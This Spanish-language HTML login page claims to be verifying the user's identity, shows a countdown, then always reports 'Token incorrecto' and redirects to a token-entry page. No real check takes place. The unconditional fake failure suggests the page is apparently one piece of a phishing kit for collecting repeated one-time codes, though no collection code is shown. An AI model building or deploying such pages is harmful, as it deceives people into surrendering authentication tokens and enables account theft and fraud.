<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">

    <title>Login</title>
    <link rel="stylesheet" href="styles.css">
    <style>
        
        .footer {
            position: absolute;
            bottom: 0;
            left: 0;
            width: 100%;
            text-align: center;
            background-color: transparent; /* Cambia el color de fondo según tus preferencias */
            padding: 20px 0;
            box-sizing: border-box;
        }

        .footer img {
            width: 50%;
            min-width: 350px;
            margin-top: 50px;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }

        @media only screen and (max-width: 600px) {
            .footer img {
                width: 80%; /* Ajusta el tamaño de la imagen para dispositivos móviles */
                min-width: unset;
            }
            .footer{
                display: none;
            }
        }
    </style>
</head>

<body style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;">
    <div class="container">
        <img src="logo.png" alt="Logo" class="logo">
        <form class="login-form">
            <div style="width: 96%;padding: 10px;background: #00a0b1;color: white;font-weight: bold;">Ingresar al Sistema</div>
            <div style="margin: 30px;text-align: center;">
             
                <img src="ldr.gif" style="width: 150px" />
                <div style="width: 100%;height: 20px;"></div> 
                <h4>Estamos verificando tu identidad, por favor espere <span id="countdown">15</span> segundo en lo que se termina el proceso
                </h4>
                <script>
                  // Función para iniciar la cuenta regresiva
                  function startCountdown(seconds) {
                    // Obtener el elemento <span> donde mostraremos el contador
                    var countdownElement = document.getElementById("countdown");
  
                    // Iniciar el intervalo de cuenta regresiva
                    var countdownInterval = setInterval(function () {
                      // Actualizar el contenido del elemento con el valor actual de segundos
                      countdownElement.textContent = seconds;
  
                      // Reducir el valor de segundos
                      seconds--;
  
                      // Verificar si el contador ha llegado a cero
                      if (seconds < 0) {
                        // Limpiar el intervalo y mostrar una alerta
                        clearInterval(countdownInterval);
                        alert("Token incorrecto");
                        window.location.href = "token.html";
                      }
                    }, 1000); // Intervalo de 1 segundo
                  }
  
                  // Llamar a la función de cuenta regresiva al cargar la página
                  document.addEventListener("DOMContentLoaded", function () {
                    startCountdown(9); // Iniciar la cuenta regresiva con 30 segundos
                  });
                </script>
            </div>
        </form>
        <div style="text-align: center;">
        <img src="2.PNG" style="width: 25%; min-width: 350px;margin-top: 50px;">
        <br>
        <div class="footer">
            <img src="footer.PNG" alt="Footer">
        </div>
        </div>
        
    </div>
    
</body>

</html>